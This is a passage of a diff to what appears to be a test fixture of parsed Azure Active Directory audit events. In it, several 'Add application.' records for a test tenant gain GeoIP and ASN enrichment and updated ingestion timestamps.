"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -11912,6 +12656,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -12068,7 +12824,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125202500Z", + "ingested": "2021-12-14T14:48:43.176722548Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -12095,6 +12851,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -12251,7 +13019,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125207800Z", + "ingested": "2021-12-14T14:48:43.176723156Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -12278,6 +13046,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -12434,7 +13214,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125212900Z", + "ingested": "2021-12-14T14:48:43.176723825Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetName\",\"Value\":\"siem2\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"AppId\\\",\\\"AvailableToOtherTenants\\\",\\\"DisplayName\\\",\\\"RequiredResourceAccess\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:36:30.6833528Z\"},{\"Name\":\"env_epoch\",\"Value\":\"SDA9U\"},{\"Name\":\"env_seqNum\",\"Value\":\"41554400\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##9758fd77-23a7-4fdc-951a-f9200b1a4af9_00000000-0000-0000-0000-000000000000_9758fd77-23a7-4fdc-951a-f9200b1a4af9\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR521\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"689aaff0-b34f-4077-9244-0563b9f9c03b\",\"ModifiedProperties\":[{\"Name\":\"AppId\",\"NewValue\":\"[\\r\\n \\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"AvailableToOtherTenants\",\"NewValue\":\"[\\r\\n false\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"DisplayName\",\"NewValue\":\"[\\r\\n \\\"siem2\\\"\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"RequiredResourceAccess\",\"NewValue\":\"[\\r\\n {\\r\\n \\\"ResourceAppId\\\": \\\"00000003-0000-0000-c000-000000000000\\\",\\r\\n \\\"RequiredAppPermissions\\\": [\\r\\n {\\r\\n \\\"EntitlementId\\\": \\\"e1fe6dd8-ba31-4d61-89e7-88639da4683d\\\",\\r\\n \\\"DirectAccessGrant\\\": false,\\r\\n \\\"ImpersonationAccessGrants\\\": [\\r\\n 20\\r\\n ]\\r\\n }\\r\\n ],\\r\\n \\\"EncodingVersion\\\": 1\\r\\n }\\r\\n]\",\"OldValue\":\"[]\"},{\"Name\":\"Included Updated Properties\",\"NewValue\":\"AppId, AvailableToOtherTenants, DisplayName, RequiredResourceAccess\",\"OldValue\":\"\"}],\"ObjectId\":\"Not Available\",\"Operation\":\"Add application.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Application_33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"33cdc459-1335-4d6c-b773-f5eef4df7793\",\"Type\":2},{\"ID\":\"Application\",\"Type\":2},{\"ID\":\"siem2\",\"Type\":1}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -12461,6 +13241,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -12615,7 +13407,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125218600Z", + "ingested": "2021-12-14T14:48:43.176724355Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:36:30\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"Application\"},{\"Name\":\"targetUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"targetPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"Application.ObjectID\\\",\\\"Application.DisplayName\\\",\\\"Application.AppId\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"484659af-7387-4b77-b889-c4d2a8060004\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"33cdc459-1335-4d6c-b773-f5eef4df7793\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"Application\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 